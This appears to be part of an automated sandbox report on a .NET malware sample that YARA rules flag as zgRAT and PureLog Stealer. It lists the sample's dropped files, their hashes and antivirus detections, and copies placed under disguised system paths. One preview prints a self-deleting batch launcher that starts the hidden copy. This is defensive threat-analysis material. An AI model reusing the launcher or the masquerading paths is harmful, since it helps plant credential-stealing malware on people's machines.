                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):74
                                                        Entropy (8bit):5.492972960106603
                                                        Encrypted:false
                                                        SSDEEP:3:4mnX1KlVog7IhiUpm9BVsj1wnLuV:4mlKw6pCj1SyV
                                                        MD5:8195A5FBF2534A919BB5C737BD85423A
                                                        SHA1:9923FEB90784FE269E5E83833F0E35FC0CBC7E4D
                                                        SHA-256:5EA21141C84E3A05BB7AEFAB73A0526972AD4DFCAE9A692946A8D6794508EB15
                                                        SHA-512:53CA5566493CA04258F4678CABB64381DBFB00446CA77D2280540E250053CD6D5527274E05419169FD6F7628FDDB464289DA1431322F13908ABAFCD1F8DE56F4
                                                        Malicious:false
                                                        Preview:ylCvN2jhoatM063it5GWj83i5FwUNn6mD9ofn9zqsXNPoKKecfngLxezsd0IFPUBdHJ1RY5uGZ
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):247
                                                        Entropy (8bit):5.732681474411286
                                                        Encrypted:false
                                                        SSDEEP:6:pigC+0i1/+U34nj90BB5qOr7EXiDeM0VrvlgRQMAagg:p5nVp+U34j90BB5m4TurvCQMZgg
                                                        MD5:FA40F28CE17A8F9A4B7154DDD07A7868
                                                        SHA1:7611D4A4BD1A8CD24137664CBB5ECF57EE47FAB0
                                                        SHA-256:4C803CFC819E4E13A8E876D7F6ABC11CE2FB6E04150D0B63471CF98EE029D37E
                                                        SHA-512:5C8AA244307738E816AB3B6FA1F139BA914EA2D22234F337973D0801B60E0FD09A61E2467ED3BC5313BFB769FC2B9ED42503E1894824F1DF86C48772C6E25154
                                                        Malicious:false
                                                        Preview:aPvNqU83VN762XD0j0WDBVKZStwVkWyhUG2EFNRTH1OItBRs709VB1NFEW56hnT9YZlvf9uViC5KHCpQbEXuXdgd3x9tRVweiPtUZfN8Gnw86C7CqofdPjl42I1rAAENQbm1SV161Znuqhh1z6DnzSO9nybQnf8FjjsfaGtUwim051NUlA1D7aX7MmNe4lSVaiKHzBbtNt1RqXDwlGonn4HIMuSx2PZKQRaWqGfjjIzOjGRzib2x7pr
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with very long lines (827), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):827
                                                        Entropy (8bit):5.906247019424677
                                                        Encrypted:false
                                                        SSDEEP:24:2LB2cHJNYCHUZmSIq4DFzHHVhbUpJVAds/Wf1D:2V24JNYCH6NiV7bUVrG1D
                                                        MD5:C2E34BA116954F2F6DB28F4419E42B04
                                                        SHA1:9DD0B4979C43FA573CE5DA7026180529346642C3
                                                        SHA-256:B32896049D621C80821B6A95CF56FC2418A047FFE0DDE607FC27B81D563C59AD
                                                        SHA-512:F35E837A99A847669DF4052AA6F4ED9A9AAD9014A250D606E0152DAA398D783B557E37754141A9AF97C7BBEF301141A955294D024CFBEF607E1A0C0451CE8B3B
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):169
                                                        Entropy (8bit):5.615612890405854
                                                        Encrypted:false
                                                        SSDEEP:3:1RGp0r3kJGKiV4uOIstyJ8/Tg3XVx3wMqQXBzNfXbkkBxnWJTESTzJTTu:PGp03KK5sN/exAMHhfrkkHOTEgpTu
                                                        MD5:8F6BB7FFD958B99AC780CE91ECB696DA
                                                        SHA1:AE7EDCB4BD7FCAAE4400C5D605E98E51855EABD1
                                                        SHA-256:273B868CADC98DFF3E1A8F8851B48C1F0A01000E247F6FFA1D4C154FFE795F72
                                                        SHA-512:D1EF3768484B72ED2A235034A7F1D16DE0B6482B33F882CCB8933A94146406A2E0496087F3748DEF94A70E4728061E154EC7DEB55E078B7A710E9A321CB84ED4
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):1306
                                                        Entropy (8bit):5.353303787007226
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                        MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                        SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                        SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                        SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                                        Process:C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):847
                                                        Entropy (8bit):5.354334472896228
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                        MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                        SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                        SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                        SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                        Process:C:\Recovery\StartMenuExperienceHost.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):847
                                                        Entropy (8bit):5.354334472896228
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                        MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                        SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                        SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                        SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):847
                                                        Entropy (8bit):5.354334472896228
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                        MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                        SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                        SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                        SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.403856189774723
                                                        Encrypted:false
                                                        SSDEEP:3:1X8uhDqS+n:1sj1
                                                        MD5:052A3C60A004680A709F08A3A7618D8C
                                                        SHA1:50C8440246367E7748A93310B546E03BDE38C43F
                                                        SHA-256:48D47F0F7A217AF28AAC682B0F3CEC99E35E96A6F9ED3076CAEEA38C9352870D
                                                        SHA-512:24BAE1BE018906C532E4FCDA01727E1C796463DFBB49E3F33B7E436C9248E591B8AC1CA54A5AE2EF111C3129096AEEB72177B80C080789CDFAE2B74935A58A77
                                                        Malicious:false
                                                        Preview:AZ7rFelEDfE3iGddOaWmNlj45
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):167
                                                        Entropy (8bit):5.16840857014452
                                                        Encrypted:false
                                                        SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7lnuQYtu9XNSBktKcKZG1t+kiE2J5xAIM/6o0RH:hCRLuVFOOr+DE7lnzWKOZG1wkn23frt
                                                        MD5:9BF27CA472B032697C90DE41660B6E43
                                                        SHA1:E158A47EC4D87D8867356BB9A25D7E338A8A7DDF
                                                        SHA-256:0F76F4B8F79BC1C41A9ABF231AA73653642181ACD09839373FBD4D0CA31CB1DF
                                                        SHA-512:5EDFCC65DB55AD894F3883E7A757BB64A626A8FE1F0C0143583C89BE9318F128D6A297E32DA916392DFD3E2E725C681A3CA7FDC15D7F3C9B693B868D9EC66788
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\StartMenuExperienceHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\oLZ05R153F.bat"
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Joe Sandbox View:
                                                        • Filename: auXl1Tzyme.exe, Detection: malicious, Browse
                                                        • Filename: cGZV10VyWC.exe, Detection: malicious, Browse
                                                        • Filename: oLlotc8NO3.exe, Detection: malicious, Browse
                                                        • Filename: PbfYaIvR5B.exe, Detection: malicious, Browse
                                                        • Filename: 9D7RwuJrth.exe, Detection: malicious, Browse
                                                        • Filename: qZoQEFZUnv.exe, Detection: malicious, Browse
                                                        • Filename: b2smJKgMG6.exe, Detection: malicious, Browse
                                                        • Filename: 01YP9Lwum8.exe, Detection: malicious, Browse
                                                        • Filename: wYP4G1XOF1.exe, Detection: malicious, Browse
                                                        • Filename: w49A5FG3yg.exe, Detection: malicious, Browse
                                                        Process:C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with very long lines (762), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):762
                                                        Entropy (8bit):5.890957328610645
                                                        Encrypted:false
                                                        SSDEEP:12:AoDXq0c54diZkkW6qTl811aLmuPkP96gYuBdy6CNiB/uqAzDVktoVL:AL0cSiZF9SjgYue6SiTAVktoR
                                                        MD5:1462E3E4C3B3F3314B49828CABE1A727
                                                        SHA1:578D3DA63E25336EA5013FA0EAC1E5EA082D1363
                                                        SHA-256:0EA5E399BD1C3559D50CC87FBC52B3799AA494A372C43ECF96C5B90FA08E6EAF
                                                        SHA-512:B342410C549DD3958F6E065C57007DBE8377D07B9A65627E2C552F4C69D5F45740DCE9B611E9ACABF0464553AB89614778F1EC9B3E06C21E9DC0DCAA8FF1D35F
                                                        Malicious:false
                                                        Process:C:\Windows\System32\PING.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):502
                                                        Entropy (8bit):4.630609828667227
                                                        Encrypted:false
                                                        SSDEEP:12:P9l5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:VfdUOAokItULVDv
                                                        MD5:01E42C7D0BFC330C8CB8F87BD1F25257
                                                        SHA1:EAD7E45750E84C22F8BB01AF7D3BF6CB81401F8F
                                                        SHA-256:A634384A405C46CD9DB3F596A3F5A032AC51B1B7634BC8FFB9D016CDBCF74CD4
                                                        SHA-512:61F024BC83B791B9A7396F4BF85F38E77E07ADFD7ECC07EE799E8A070533064FC5FB552DDFD41A3DF07E92D41D37585EA962FEF98DAB9CBD1CC4C84812CAC64A
                                                        Malicious:false
                                                        Preview:..Pinging 965543 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.4440967682851955
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:0JLWNg4Sz1.exe
                                                        File size:1'688'064 bytes
                                                        MD5:844679e76d8254bedd67c98610f7d7ac
                                                        SHA1:4222ebbb055830096b829f072783423dbe255932
                                                        SHA256:9b08f03985d3378123ba236fae1b41b42fcc9af87932655a5120e04fa9a21942
                                                        SHA512:fddb80736936d7c0d46ec3958885237681cbbd416455d7a48d075092d38a0c5e435112c25b595b8cc99b0a8ed2143ac2f28e893373a7b6e9772ee722706a3c05
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        TLSH:D5758D1655935E3BC2A15B318457403D82A5C7367962FF1B390F24E2B803BF5CBA72AB
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............@................................
                                                        Icon Hash:90cececece8e8eb0
                                                        Entrypoint:0x59d9ae
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6717909A [Tue Oct 22 11:46:34 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
